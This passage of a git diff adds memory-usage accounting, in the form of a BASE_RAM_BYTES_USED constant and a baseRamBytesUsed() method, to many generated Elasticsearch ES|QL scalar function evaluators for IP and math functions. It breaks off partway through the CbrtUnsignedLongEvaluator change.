b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/ip/CIDRMatchEvaluator.java @@ -9,6 +9,7 @@ import java.lang.String; import java.util.Arrays; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -27,6 +28,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class CIDRMatchEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(CIDRMatchEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator ip; @@ -69,6 +72,16 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += ip.baseRamBytesUsed(); + for (EvalOperator.ExpressionEvaluator e : cidrs) { + baseRamBytesUsed += e.baseRamBytesUsed(); + } + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BytesRefBlock ipBlock, BytesRefBlock[] cidrsBlocks) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { BytesRef ipScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/ip/IpPrefixEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/ip/IpPrefixEvaluator.java index fcc084a7bf240..3e1916fd81cb0 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/ip/IpPrefixEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/ip/IpPrefixEvaluator.java @@ -9,6 +9,7 @@ import java.lang.String; import java.util.function.Function; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -26,6 +27,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class IpPrefixEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(IpPrefixEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator ip; @@ -75,6 +78,15 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += ip.baseRamBytesUsed(); + baseRamBytesUsed += prefixLengthV4.baseRamBytesUsed(); + baseRamBytesUsed += prefixLengthV6.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BytesRefBlock eval(int positionCount, BytesRefBlock ipBlock, IntBlock prefixLengthV4Block, IntBlock prefixLengthV6Block) { try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/AbsDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/AbsDoubleEvaluator.java index 8cda84da6e192..e5f1ee642d869 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/AbsDoubleEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/AbsDoubleEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class AbsDoubleEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(AbsDoubleEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator fieldVal; @@ -48,6 +51,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += fieldVal.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock fieldValBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/AbsIntEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/AbsIntEvaluator.java index eeb7f46d2224d..8bd0f87643767 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/AbsIntEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/AbsIntEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.IntBlock; import org.elasticsearch.compute.data.IntVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class AbsIntEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(AbsIntEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator fieldVal; @@ -48,6 +51,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += fieldVal.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public IntBlock eval(int positionCount, IntBlock fieldValBlock) { try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/AbsLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/AbsLongEvaluator.java index 92946a8691ee9..e7b18bfe73430 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/AbsLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/AbsLongEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class AbsLongEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(AbsLongEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator fieldVal; @@ -48,6 +51,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += fieldVal.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock fieldValBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/AcosEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/AcosEvaluator.java index 8f5ab21f30b1a..033674d5f7fa6 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/AcosEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/AcosEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class AcosEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(AcosEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -49,6 +52,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock valBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/AsinEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/AsinEvaluator.java index 0e0ac4b93d11f..139ec3ce20c00 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/AsinEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/AsinEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class AsinEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(AsinEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -49,6 +52,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock valBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/Atan2Evaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/Atan2Evaluator.java index 09d0b1a7fd35c..7d9d8bca62266 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/Atan2Evaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/Atan2Evaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class Atan2Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(Atan2Evaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator y; @@ -57,6 +60,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += y.baseRamBytesUsed(); + baseRamBytesUsed += x.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock yBlock, DoubleBlock xBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/AtanEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/AtanEvaluator.java index 0cd8adda340e5..f238c2d774f14 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/AtanEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/AtanEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class AtanEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(AtanEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -48,6 +51,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock valBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CastIntToDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CastIntToDoubleEvaluator.java index e43daae68ed66..d28e409a55f83 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CastIntToDoubleEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CastIntToDoubleEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class CastIntToDoubleEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(CastIntToDoubleEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator v; @@ -50,6 +53,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += v.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, IntBlock vBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CastIntToLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CastIntToLongEvaluator.java index f1d850fa935f5..ddb35ef13b17e 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CastIntToLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CastIntToLongEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.IntBlock; import org.elasticsearch.compute.data.IntVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class CastIntToLongEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(CastIntToLongEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator v; @@ -50,6 +53,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += v.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, IntBlock vBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CastIntToUnsignedLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CastIntToUnsignedLongEvaluator.java index 69e2a69a59027..d382321b5569c 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CastIntToUnsignedLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CastIntToUnsignedLongEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.IntBlock; import org.elasticsearch.compute.data.IntVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class CastIntToUnsignedLongEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(CastIntToUnsignedLongEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator v; @@ -50,6 +53,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += v.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, IntBlock vBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CastLongToDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CastLongToDoubleEvaluator.java index e82ed233839f1..4e9af32c63b95 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CastLongToDoubleEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CastLongToDoubleEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class CastLongToDoubleEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(CastLongToDoubleEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator v; @@ -50,6 +53,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += v.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, LongBlock vBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CastLongToUnsignedLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CastLongToUnsignedLongEvaluator.java index ba78e37cf5ee3..f54e1265181e7 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CastLongToUnsignedLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CastLongToUnsignedLongEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class CastLongToUnsignedLongEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(CastLongToUnsignedLongEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator v; @@ -48,6 +51,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += v.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock vBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CastUnsignedLongToDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CastUnsignedLongToDoubleEvaluator.java index 458a74ad704cc..d83c7e5918677 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CastUnsignedLongToDoubleEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CastUnsignedLongToDoubleEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class CastUnsignedLongToDoubleEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(CastUnsignedLongToDoubleEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator v; @@ -50,6 +53,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += v.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, LongBlock vBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CbrtDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CbrtDoubleEvaluator.java index 923ab07f61ce0..bc3af8e043f3d 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CbrtDoubleEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CbrtDoubleEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class CbrtDoubleEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(CbrtDoubleEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -49,6 +52,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock valBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CbrtIntEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CbrtIntEvaluator.java index 63f41e08a65f1..4cf7e99a7656a 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CbrtIntEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CbrtIntEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.IntBlock; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class CbrtIntEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(CbrtIntEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -50,6 +53,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, IntBlock valBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CbrtLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CbrtLongEvaluator.java index a94ea6dab1446..f17eb8236ccf6 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CbrtLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CbrtLongEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.LongBlock; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class CbrtLongEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(CbrtLongEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -50,6 +53,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, LongBlock valBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CbrtUnsignedLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CbrtUnsignedLongEvaluator.java index a959e01f44a1f..e4d82882afa12 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CbrtUnsignedLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/CbrtUnsignedLongEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class CbrtUnsignedLongEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(CbrtUnsignedLongEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -50,6 +53,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = 